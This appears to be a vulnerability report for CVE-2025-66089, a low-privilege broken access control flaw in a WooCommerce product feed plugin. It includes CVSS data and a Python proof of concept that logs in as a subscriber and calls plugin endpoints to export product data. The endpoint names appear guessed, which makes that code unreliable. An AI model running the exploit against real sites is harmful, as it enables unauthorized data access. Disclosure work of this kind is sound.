Security Vulnerability Report
中文
CVE-2025-66089 CVSS 4.3 MEDIUM

CVE-2025-66089

Published: 2025-11-21 13:15:50
Last Modified: 2026-04-27 18:16:35

Description

Missing Authorization vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebToffee Product Feed for WooCommerce (webtoffee-product-feed) <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66089 PoC - WebToffee Product Feed for WooCommerce Broken Access Control # This PoC demonstrates accessing admin-only functionality with low-privilege user import requests import json # Configuration target_url = "http://target-wordpress-site.com" username = "subscriber_user" # Low-privilege user password = "password123" # Step 1: Authenticate with low-privilege account session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Access the vulnerable plugin endpoint (admin-only function) # The plugin's REST API endpoints lack proper capability checks vulnerable_endpoints = [ f"{target_url}/wp-json/webtoffee/v1/feed/export", f"{target_url}/wp-json/webtoffee/v1/feed/settings", f"{target_url}/wp-admin/admin-ajax.php?action=webtoffee_export_feed" ] for endpoint in vulnerable_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200: print(f"[!] Vulnerable endpoint accessible: {endpoint}") print(f"Response: {response.text[:500]}") elif response.status_code == 403: print(f"[*] Endpoint protected: {endpoint}") except Exception as e: print(f"Error accessing {endpoint}: {e}") # Step 3: Exploit - Export all product data without admin privileges print("\n[*] Attempting to export product feed data...") exploit_data = { "action": "webtoffee_export_feed", "feed_type": "google", "products": "all" } exploit_response = session.post( f"{target_url}/wp-admin/admin-ajax.php", data=exploit_data ) print(f"Exploit response status: {exploit_response.status_code}") print(f"Response content: {exploit_response.text[:1000]}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66089", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:50.060", "lastModified": "2026-04-27T18:16:35.093", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webtoffee-product-feed/vulnerability/wordpress-product-feed-for-woocommerce-plugin-2-3-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}